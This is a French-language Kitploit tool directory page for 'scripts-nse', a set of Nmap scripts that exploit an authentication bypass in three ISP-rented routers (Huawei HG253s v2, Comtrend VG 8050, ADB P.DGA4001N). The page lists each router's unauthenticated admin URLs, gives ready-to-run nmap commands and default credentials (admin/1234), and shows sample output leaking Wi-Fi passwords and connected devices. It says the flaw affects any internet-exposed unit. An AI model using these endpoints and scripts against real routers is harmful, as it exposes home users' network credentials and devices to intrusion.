Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
scripts-nse — Quelques scripts NSE pour rechercher des informations sur les routeurs | Kitploit
Outils/GitHubGitHub/danilabs/scripts-nse
ReconnaissanceScanners de VulnérabilitésExploitationCollecte d'InformationsSécurité WebSécurité RéseauTests d'Intrusion
GitHubdanilabs/scripts-nse

scripts-nse

Quelques scripts NSE pour rechercher des informations sur les routeurs

Voir le dépôt
3626il y a 10 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Qu'est-ce que c'est ?

Des scripts NSE pour rechercher des informations sur des routeurs.

L'auteur de ces scripts est VicenDominguez. Il a trouvé le 0-Day sur Huawei, je l'ai seulement modifié pour deux autres.

L'auteur de ce script n'est pas responsable de son utilisation.

#Huawei HG253s v2 Vodafone-Espagne commence à louer un nouveau routeur Huawei HG253v2 à ses clients espagnols. Ce nouveau routeur est livré avec une nouvelle version du firmware.

##Vulnérabilité En gros, il ne valide pas le cookie de session dans certaines pages d'administration. Il est donc possible d'obtenir directement des informations à partir de ces URL sur n'importe quel routeur ouvert à Internet.

  • http://IPhtml_253s/api/ntwk/WlanBasic
  • http://IP/html_253s/api/system/diagnose_internet
  • http://IP/html_253s/api/system/hostinfo?type=ethhost
  • http://IP/html_253s/api/system/hostinfo?type=guesthost
  • http://IP/html_253s/api/system/hostinfo?type=homehost
  • http://IP/html_253s/api/system/hostinfo?type=wifihost
  • http://IP/html_253s/api/system/wizardcfg

##Utilisation

root@kitploit:~
nmap --script=http-enum-vodafone-hua253s.nse -p80,443 -sS x.x.x.x

Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT    STATE SERVICE
80/tcp  open  http
| http-enum-vodafone-hua253s: 
|   SSID: vodafone070 (14:b9:XX:XX:XX:XX) Password: (AES) 123456
|   Device: android-246e67b281179679-Wireless MAC: 48:5A:3F:XX:XX:XX IP: 192.168.0.XX

#Comtrend VG 8050 Telefonica-Espagne commence à louer un nouveau routeur Comtrend VG 8050 à ses clients espagnols. Ce nouveau routeur est livré avec une nouvelle version du firmware. Ce bug a été trouvé par DaniLabs

##Vulnérabilité En gros, il ne valide pas le cookie de session dans certaines pages d'administration. Il est donc possible d'obtenir directement des informations à partir de ces URL sur n'importe quel routeur ouvert à Internet.

  • http://IP/getWifiInfo.jx
  • http://IP/listDevices.jx
  • http://IP/infoApplications.jx

##Utilisation

root@kitploit:~
nmap --script=http-enum-telefonica-comtrend-vg-8050.nse -p80,443 -sS x.x.x.x

Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT    STATE SERVICE
80/tcp  open  http
| http-enum-telefonica-comtrend-vg-8050: 
|   SSID: MOVISTAR_XXX
|   Cipher Algorithm: WPA
|   Password WEP: 
|   Password WPA: gTU3NkXE44RYjuM2RrxM
|   Password WPA2: 
|   Device: 192.168.0.X MAC: 5c:97:X:X:X:X IP: 192.168.0.X

#ADB P.DGA4001N alias HomeStation Telefonica-Espagne commence à louer un nouveau routeur ADB P.DGA4001N à ses clients espagnols. Ce nouveau routeur est livré avec une nouvelle version du firmware. Ce bug a été trouvé par DaniLabs

##Vulnérabilité En gros, il ne valide pas le cookie de session dans certaines pages d'administration. Il est donc possible d'obtenir directement des informations à partir de ces URL sur n'importe quel routeur ouvert à Internet.

  • http://IP/getWifiInfo.jx
  • http://IP/listDevices.jx
  • http://IP/infoApplications.jx

Les identifiants par défaut sont admin / 1234 ##Utilisation

root@kitploit:~
nmap --script=http-enum-telefonica-homestation.nse -p80,443 -sS x.x.x.x

Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT    STATE SERVICE
80/tcp  open  http
| http-enum-telefonica-homestation: 
|   SSID: WLAN_HOME
|   Cipher Algorithm: WEP
|   Device: IphonePedro MAC: A8:8E:24:X:X:X IP: 192.168.1.X

Télécharger l’outil